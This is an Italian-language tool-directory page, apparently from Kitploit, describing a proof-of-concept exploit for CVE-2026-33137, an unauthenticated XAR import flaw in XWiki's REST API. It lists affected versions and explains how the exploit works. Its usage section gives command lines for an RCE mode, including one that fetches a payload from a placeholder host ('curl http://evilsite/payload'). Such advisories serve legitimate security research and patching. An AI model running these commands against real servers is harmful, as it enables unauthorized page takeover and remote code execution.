Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-33137 — XWiki Platform - CVE-2026-33137 PoC - Importazione XAR non autenticata tramite REST /wikis/{wikiName} | Kitploit
Strumenti/GitHubGitHub/portbuster1337/cve-2026-33137
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubportbuster1337/cve-2026-33137

CVE-2026-33137

XWiki Platform - CVE-2026-33137 PoC - Importazione XAR non autenticata tramite REST /wikis/{wikiName}

Vedi Repository
474 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-33137

XWiki Platform - Importazione XAR non autenticata tramite REST /wikis/{wikiName}

Descrizione

L'endpoint dell'API REST POST /wikis/{wikiName} in XWiki Platform esegue un'importazione XAR (XWiki Archive) senza effettuare alcun controllo di autenticazione o autorizzazione. Un attaccante non autenticato può creare o aggiornare documenti arbitrari nel wiki di destinazione inviando un file XAR appositamente predisposto.

  • CVE: CVE-2026-33137
  • CWE: CWE-862 Mancanza di Autorizzazione
  • CVSS 4.0: 9.3 (Critico) - AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • Pubblicato: 2026-05-20

Versioni Affette

StatoVersioni
Vulnerabile> 15.10.16, > 16.4.6, > 16.10.2
Corretta16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1

Impatto

Un attaccante non autenticato può:

  • Creare pagine wiki arbitrarie con contenuto arbitrario
  • Sovrascrivere pagine wiki esistenti
  • Potenzialmente ottenere RCE creando pagine con script Velocity/Groovy malevoli (se lo scripting è abilitato)

Dettagli

L'endpoint REST POST /xwiki/rest/wikis/{wikiName} accetta un file XAR nel corpo della richiesta e lo importa direttamente nel wiki senza verificare se il richiedente abbia diritti di ADMIN. La correzione (commit 4b7b95b) aggiunge un controllo di autorizzazione utilizzando ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).

Utilizzo del PoC

# Install requirements
pip install requests

# Basic usage
python poc.py -t http://target:8080

# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage

# Probe the target first
python poc.py -t http://target:8080 --probe

# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080

# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"

# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"

# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass

Modalità RCE (--rce)

Il flag --rce importa pagine contenenti payload Groovy e Velocity che eseguono la stringa di comando specificata. Automaticamente:

  1. Esegue un controllo preliminare (rilevamento della versione, stato della vulnerabilità, test dell'endpoint XAR, accessibilità del percorso di attivazione)
  2. Importa pagine con il comando specificato dall'utente incorporato nelle macro {{groovy}} e {{velocity}}
  3. Tenta il rendering tramite API REST, interfaccia web e iniezione stile SSTI
  4. Riporta quali percorsi di attivazione sono accessibili o bloccati

Requisiti per un RCE riuscito:

  • Il target deve consentire la visualizzazione delle pagine da parte degli ospiti (o fornire credenziali tramite -u / --password)
  • I diritti di scripting/programmazione devono essere abilitati per l'utente che visualizza
  • I percorsi di attivazione non devono essere bloccati da reindirizzamenti di autenticazione

Come Funziona l'Exploit

  1. Viene costruito un file XAR (ZIP) minimale contenente:
    • package.xml - descrittore del pacchetto
    • {Space}/{Page}.xml - documento XML con contenuto
  2. I byte XAR vengono inviati tramite POST all'endpoint vulnerabile
  3. Se vulnerabile, il documento viene creato senza autenticazione
  4. Opzionalmente verifica leggendo i metadati del documento

Esclusione di Responsabilità

Questo PoC è fornito esclusivamente a scopo didattico e per test di sicurezza autorizzati. L'uso non autorizzato di questo exploit contro sistemi di cui non si possiede la proprietà o per i quali non si ha esplicito permesso di test è illegale. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo software.

Riferimenti

  • Avviso di Sicurezza di GitHub GHSA-qrvh-r3f2-9h4r
  • Commit 4b7b95b (correzione)
  • JIRA XWIKI-23953
  • Voce NVD
Scarica lo strumento